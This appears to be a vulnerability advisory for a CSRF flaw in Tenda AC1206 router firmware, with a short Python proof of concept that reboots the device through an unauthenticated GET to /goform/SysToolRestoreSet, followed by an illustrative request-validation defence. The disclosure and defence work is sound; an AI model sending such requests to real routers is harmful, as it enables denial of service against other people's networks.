CVE-2022-42078: myCVE/AC1206-2.md at main · tianhui999/myCVE
Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolRestoreSet.
Affected device: Tenda-AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 (https://www.tenda.com.cn/download/detail-2766.html)
Vulnerability Type: Cross Site Request Forgery (CSRF)
Impact: Denial of Service (DoS)
Vulnerability description
This vulnerability lies in the /goform/SysToolRestoreSet page and affects the latest version of Tenda-AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 (https://www.tenda.com.cn/download/detail-2766.html).
The vulnerability exists in the function fromSysToolRestoreSet in the file /bin/httpd.
It allows remote attackers to reboot the device and cause denial of service via a payload hosted by an attacker-controlled web page.
PoC and reproduction
To reproduce the vulnerability, follow these steps:
- Boot the firmware with qemu-system or by other means (a real device)
- Send the following PoC
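```python
import requests

# Target: the router's web interface in the lab setup above
url = "http://192.168.23.133/goform/SysToolRestoreSet"
# A plain GET with no token or session is sent to the handler
r = requests.get(url)
print(r.content)
```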
Sending this PoC achieves the effect of a denial-of-service (DoS) attack.
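The request validation that would reject the request above, as an added example that is not code from this advisory or from the Tenda firmware. The `x-csrf-token` header, the per-session token and the `check_request` helper are assumptions made for illustration; the sample requests are constructed.

```python
import hmac
from urllib.parse import urlsplit

# Assumption: set of state-changing paths; the one entry is the endpoint named on the page.
STATE_CHANGING = {"/goform/SysToolRestoreSet"}


def source_host(headers):
    """Host of the page that initiated the request, from Origin or Referer."""
    for name in ("origin", "referer"):
        value = headers.get(name)
        if value:
            return urlsplit(value).netloc.lower() or None
    return None


def check_request(method, path, headers, session_token):
    """Return (allowed, reason). headers uses lowercase names; session_token is
    the anti-CSRF token issued to the logged-in session (hypothetical scheme)."""
    if path not in STATE_CHANGING:
        return True, "not state-changing"
    if method != "POST":
        return False, "state change requires POST"
    src = source_host(headers)
    if src is None or src != headers.get("host", "").lower():
        return False, "cross-origin or missing Origin/Referer"
    sent = headers.get("x-csrf-token", "")
    # Constant-time comparison; an empty session token never validates.
    if not session_token or not hmac.compare_digest(sent.encode(), session_token.encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"


# Constructed sample requests (not captured traffic).
TOKEN = "constructed-session-token"
PATH = "/goform/SysToolRestoreSet"
SAMPLES = [
    ("GET", PATH, {"host": "192.168.23.133"}),
    ("POST", PATH, {"host": "192.168.23.133", "origin": "http://other.example",
                    "x-csrf-token": TOKEN}),
    ("POST", PATH, {"host": "192.168.23.133", "origin": "http://192.168.23.133",
                    "x-csrf-token": TOKEN}),
]

if __name__ == "__main__":
    for method, path, headers in SAMPLES:
        print(method, headers.get("origin"), check_request(method, path, headers, TOKEN))
```

Only the third sample, a same-origin POST carrying the session's token, is accepted; the bare GET and the cross-origin POST are both refused before the reboot action would run.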